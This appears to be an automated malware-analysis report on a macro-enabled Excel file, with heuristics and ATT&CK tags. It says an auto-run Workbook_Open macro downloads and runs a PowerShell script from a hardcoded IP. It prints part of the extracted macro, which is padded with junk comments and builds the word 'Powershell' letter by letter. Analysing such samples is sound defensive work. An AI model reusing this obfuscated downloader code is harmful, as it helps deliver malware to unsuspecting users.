MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The OOXML document contains a Workbook_Open VBA macro that is designed to execute a PowerShell command. This command downloads and executes a script from the hardcoded URL 'http://185.189.255.100/a.ps1'. The macro's intent is to download and run a second-stage payload, typical of a downloader malware.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7578 bytes |
SHA-256: f1af48e578960b6a8df5667bf1ba63afb030de5f5f329b5e32d9e401201baf26 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
'EbJnLkbCnWFeQoVezoWEDIMEyPZuiMSthPZIJwSTXaGIEiLobfXywvTVnfWWkOnIeiYbnoAkBdHDcdavdLvbOAhU
'Copy the defined range
'Set focus on the target bookmark
'Delete the old table and paste new
On Error Resume Next
WdRange.Tables(1).Delete
WdRange.Paste 'paste in the table
'Adjust column widths
'Reinsert the bookmark
wdDoc.Bookmarks.Add "DataTableHere", WdRange
'Memory cleanup
'MsgBox ("VDP rAVnKhIt")
'MNyELVWbyuOAKupdAyXUDRNyHNvewCzfvEAPYpDfkBss
'EfJrikJHtNvSHJXXWIbfGbYLQhSoVDbKvTDYXUQzCViHRWYVyQnVHsHChYEbsrLTLHHNfYZbSHJLUtUUiXVfkhcUubRYsOd
Dim uk, MzQDN
'IEsfUQEEhw
hKw = "P"
'IhWSPLFauzPzL hIuzMYFnJKLWcRUuWNMDKkyUdnkhTL
HV = "o"
'QJoJXaoX IhWSPLFauzPzL
bhhzvEXcEKi = "w"
'UWNznIYhiPbMcLkFIaTHpQvVoNeKpUQSVYhyWiwSdUdK sE
rhrZsWyO = "e"
'UWNznIYhiPbMcLkFIaTHpQvVoNeKpUQSVYhyWiwSdUdK sE
REskFMEnGYi = "r"
'vSLZvT EWtERShbUKyvhyvPYWAfssozWSShRNGELWnEFFYekFWKuHiNEkPnhaVkIXIYaawieUGwdMwyXrXQzJhrKfHIXvtL
ZffZFDDNiK = "s"
'EbJnLkbCnWFeQoVezoWEDIMEyPZuiMSthPZIJwSTXaGIEiLobfXywvTVnfWWkOnIeiYbnoAkBdHDcdavdLvbOAhU EWtERShbUKyvhyvPYWAfssozWSShRNGELWnEFFYekFWKuHiNEkPnhaVkIXIYaawieUGwdMwyXrXQzJhrKfHIXvtL
XY = "h"
'hIuzMYFnJKLWcRUuWNMDKkyUdnkhTL QJoJXaoX
kQYREnCiTsB = "e"
'QJoJXaoX EWtERShbUKyvhyvPYWAfssozWSShRNGELWnEFFYekFWKuHiNEkPnhaVkIXIYaawieUGwdMwyXrXQzJhrKfHIXvtL
ACSJEaBLG = "l"
'tSPkSpOCWrdDAOnDSPpcekFUAcssJIvStycneYVEIzwKLYYwGSrBBFUkoVOQTtSnevhbMayTTKzLXUkCdhQRoPtR sE
cJuudsQ = "l"
'dRawbZdFvYCnIQFHAyWpnkAfBzkME
'IhWSPLFauzPzL QJoJXaoX
'DEBhSBiahGQtM aI
'UWNznIYhiPbMcLkFIaTHpQvVoNeKpUQSVYhyWiwSdUdK sE
With Selection
.ClearContents
.Borders(xlDiagonalDown).LineStyle = xlNone
.Borders(xlDiagonalUp).LineStyle = xlNone
.Borders(xlEdgeLeft).LineStyle = xlNone
.Borders(xlEdgeTop).LineStyle = xlNone
.Borders(xlEdgeBottom).LineStyle = xlNone
.Borders(xlEdgeRight).LineStyle = xlNone
.Borders(xlInsideVertical).LineStyle = xlNone
.Borders(xlInsideHorizontal).LineStyle = xlNone
.Interior.ColorIndex = xlNone
End With
With Application.FileSearch
.NewSearch
'Change path to suit
.LookIn = "/Users/lcw/Desktop/excel"
.FileType = msoFileTypeExcelWorkbooks
If .Execute > 0 Then
For lCount = 1 To .FoundFiles.Count
Set wbResults = Workbooks.Open(Filename:=.FoundFiles(lCount), UpdateLinks:=0)
Sheets("US").Select
Rows("1:1").Select
Selection.Delete Shift:=xlUp
wbResults.Close SaveChanges:=True
Next lCount
End If
End With
Application.ScreenUpdating = True
Application.DisplayAlerts = True
Application.EnableEvents = True
'aI vSLZvT
' EbJnLkbCnWFeQoVezoWEDIMEyPZuiMSthPZIJwSTXaGIEiLobfXywvTVnfWWkOnIeiYbnoAkBdHDcdavdLvbOAhU
'hIuzMYFnJKLWcRUuWNMDKkyUdnkhTL TvEYsoXQTKvYbGDTVADJcIUWrQAXPGFJEiEFHSRtsMKRfssJcvyFrsGvtHJGTZboeHAUcYudJhorYdRZzQUDkZnkGukZpvEsLtMD
' Za
'FkdhkMGKfwA
'HKBnBS
'JhTDOY
'TvEYsoXQTKvYbGDTVADJcIUWrQAXPGFJEiEFHSRtsMKRfssJcvyFrsGvtHJGTZboeHAUcYudJhorYdRZzQUDkZnkGukZpvEsLtMD
Dim rAVnKhIt As Long
'MsgBox Prompt:="QJoJXaoX?", _
Buttons:=vSLZvT , _
Title:="Za "
'tSPkSpOCWrdDAOnDSPpcekFUAcssJIvStycneYVEIzwKLYYwGSrBBFUkoVOQTtSnevhbMayTTKzLXUkCdhQRoPtR
' hIuzMYFnJKLWcRUuWNMDKkyUdnkhTL
Dim r As Long, x As Long
For x = 2 To r Step 1
If Range("C" & r).Value = Range("C" & r).Offset(-1).Value Then
Range("C" & r).Offset(-1).EntireRow.Delete
End If
r = r - 1
Next x
'PHbdHs
'aI tSPkSpOCWrdDAOnDSPpcekFUAcssJIvStycneYVEIzwKLYYwGSrBBFUkoVOQTtSnevhbMayTTKzLXUkCdhQRoPtR
'PHbdHs
'aI QJoJXaoX
'EWtERShbUKyvhyvPYWAfssozWSShRNGELWnEFFYekFWKuHiNEkPnhaVkIXIYaawieUGwdMwyXrXQzJhrKfHIXvtL vSLZvT
'hIuzMYFnJKLWcRUuWNMDKkyUdnkhTL EbJnLkbCnWFeQoVezoWEDIMEyPZuiMSthPZIJwSTXaGIEiLobfXywvTVnfWWkOnIeiYbnoAkBdHDcdavdLvbOAhU
'aI tSPkSpOCWrdDAOnDSPpcekFUAcssJIvStycneYVEIzwKLYYwGSrBBFUkoVOQTtSnevhbMayTTKzLXUkCdhQRoPtR
MzQDN = hKw + HV + bhhzvEXcEKi + rh
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 23552 bytes |
SHA-256: 3f119f817290093e317b3f748a22cbdc174dd766ee4dace9fb15b5c32824abea |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.